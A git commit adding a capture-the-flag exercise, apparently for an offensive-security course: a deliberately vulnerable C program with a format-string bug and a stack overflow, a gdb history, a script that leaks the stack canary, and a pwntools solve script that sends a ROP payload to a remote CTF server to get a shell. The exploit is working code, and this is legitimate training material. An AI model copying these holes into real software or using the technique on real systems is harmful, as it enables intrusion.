Second CTFs part

2026-05-10 20:42:33 +02:00
parent 5635246581
commit 9f240eba3b
87 changed files with 404506 additions and 0 deletions
--- a/canary/04_secret_library/.gdb_history
+++ b/canary/04_secret_library/.gdb_history
@@ -0,0 +1,21 @@
+quit
+quit
+r
+disass vuln
+b *0x0000000000401364
+R
+R
+r
+disass vuln
+r
+disass vuln
+r
+n
+disass vuln
+r
+n
+disass vuln
+b *0x000000000040135b
+r
+r
+quit
--- a/canary/04_secret_library/find_canary.py
+++ b/canary/04_secret_library/find_canary.py
@@ -0,0 +1,17 @@
+#!/usr/bin/env python3
+from pwn import *
+import re
+
+elf = context.binary = ELF("./secret_library", checksec=False)
+
+context.log_level='warn'
+for i in range(35):
+    p = process(elf.path)
+    p.recvline()
+    p.sendline(f"%{i}$lx") 
+    val = p.recvline().split(b",")[1].strip()
+    if( val[-2:] == b"00"):
+        print(f"Possible canary: {val} at position: {i}")
+    p.shutdown()
+
+#p.interactive()
--- a/canary/04_secret_library/main.c
+++ b/canary/04_secret_library/main.c
@@ -0,0 +1,34 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void setup() {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void win() {
+    printf("You've discovered the forbidden section!\n");
+    system("/bin/sh");
+}
+
+void vuln() {
+    char buf[128];
+    
+    printf("Sign the guestbook: ");
+    read(0, buf, 127);
+    buf[127] = '\0';
+    printf("Hello, ");
+    printf(buf);
+    
+    printf("\nLeave a review: ");
+    read(0, buf, 512);
+}
+
+int main() {
+    setup();
+    printf("Welcome to the Secret Library!\n");
+    vuln();
+    return 0;
+}
--- a/canary/04_secret_library/secret_library
+++ b/canary/04_secret_library/secret_library
--- a/canary/04_secret_library/solve.py
+++ b/canary/04_secret_library/solve.py
@@ -0,0 +1,26 @@
+#!/usr/bin/env python3
+from pwn import *
+
+CANARY_POS = 23 
+CANARY_OFF = 136
+elf = context.binary = ELF("./secret_library", checksec=False)
+
+#p = process(elf.path)
+p = remote('offsec.m0lecon.it', 13501)
+print(p.recvline())
+p.sendline(f"%{CANARY_POS}$lx".encode())
+val = p.recvline().split(b",")[1].strip()
+print(val)
+canary = int(val, 16)
+print(p.recvline())
+payload = flat(
+    b'A' * CANARY_OFF,
+    p64(canary),
+    b'B' * 8, #pass rbp
+    p64(0x000000000040101a),
+    p64(0x0000000000401262),
+)
+p.send(payload)
+print(p.recvline())
+#print(p.recvline())
+p.interactive()